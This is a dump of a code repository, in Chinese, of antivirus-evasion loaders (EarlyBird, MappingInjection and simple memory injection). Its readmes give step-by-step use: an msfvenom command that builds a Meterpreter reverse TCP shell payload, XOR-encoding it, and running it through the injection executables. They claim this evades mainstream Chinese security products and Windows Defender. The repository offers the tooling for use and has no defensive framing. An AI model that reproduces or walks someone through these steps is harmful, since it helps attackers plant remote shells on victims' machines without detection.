├── README.md ├── EarlyBird ├── EarlyBird.exe ├── XorEncode.exe └── README.md ├── MappingInjection ├── XorEncode.exe ├── MappingInjection.exe └── README.md └── SimpleMemoryInjection ├── XorEncode.exe ├── ProcessTest.exe └── README.md /README.md: -------------------------------------------------------------------------------- 1 | # Bypass Security software 2 | 该仓库用于放置自己编写绕过杀软的程序(免杀) 3 | 4 | 博客地址:https://reader-l.github.io 5 | -------------------------------------------------------------------------------- /EarlyBird/EarlyBird.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/EarlyBird/EarlyBird.exe -------------------------------------------------------------------------------- /EarlyBird/XorEncode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/EarlyBird/XorEncode.exe -------------------------------------------------------------------------------- /MappingInjection/XorEncode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/MappingInjection/XorEncode.exe -------------------------------------------------------------------------------- /SimpleMemoryInjection/XorEncode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/SimpleMemoryInjection/XorEncode.exe -------------------------------------------------------------------------------- /MappingInjection/MappingInjection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/MappingInjection/MappingInjection.exe -------------------------------------------------------------------------------- /SimpleMemoryInjection/ProcessTest.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/SimpleMemoryInjection/ProcessTest.exe -------------------------------------------------------------------------------- /SimpleMemoryInjection/README.md: -------------------------------------------------------------------------------- 1 | 该仓库用于放置自己编写绕过杀软的程序 2 | 使用方法: 3 | 4 | 1.用MSF生成完整的shellcode:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.43.147 lport=4444 -f raw > beacon.bin 5 | 6 | 2.然后用XorEncode.exe加密生成的shellcode文件:XorEncode.exe beacon.bin,结果会生成一个EncodeRAWData 7 | 8 | 3.最后用ProcessTest.exe执行加密后的文件EncodeRAWData:ProcessTest.exe EncodeRAWData 9 | 10 | 绕过效果:可以绕过国内主流的安全防护软件 11 | 12 | 博客地址:https://reader-l.github.io -------------------------------------------------------------------------------- /EarlyBird/README.md: -------------------------------------------------------------------------------- 1 | 该仓库用于放置自己编写绕过杀软的程序 2 | 使用方法: 3 | 4 | 1.用MSF生成完整的shellcode:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.43.147 lport=4444 -f raw > beacon.bin 5 | 6 | 2.然后用XorEncode.exe加密生成的shellcode文件:XorEncode.exe beacon.bin,结果会生成一个EncodeRAWData 7 | 8 | 3.最后用EarlyBird.exe执行加密后的文件EncodeRAWData:EarlyBird.exe EncodeRAWData 9 | 10 | 绕过效果:可以绕过国内主流的安全防护软件以及windows defender 11 | 12 | 博客地址:https://reader-l.github.io -------------------------------------------------------------------------------- /MappingInjection/README.md: -------------------------------------------------------------------------------- 1 | 该仓库用于放置自己编写绕过杀软的程序 2 | 使用方法: 3 | 4 | 1.用MSF生成完整的shellcode:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.43.147 lport=4444 -f raw > beacon.bin 5 | 6 | 2.然后用XorEncode.exe加密生成的shellcode文件:XorEncode.exe beacon.bin,结果会生成一个EncodeRAWData 7 | 8 | 3.最后用EarlyBird.exe执行加密后的文件EncodeRAWData:MappingInjection.exe EncodeRAWData 9 | 10 | 绕过效果:可以绕过国内主流的安全防护软件以及windows defender 11 | 12 | 博客地址:https://reader-l.github.io --------------------------------------------------------------------------------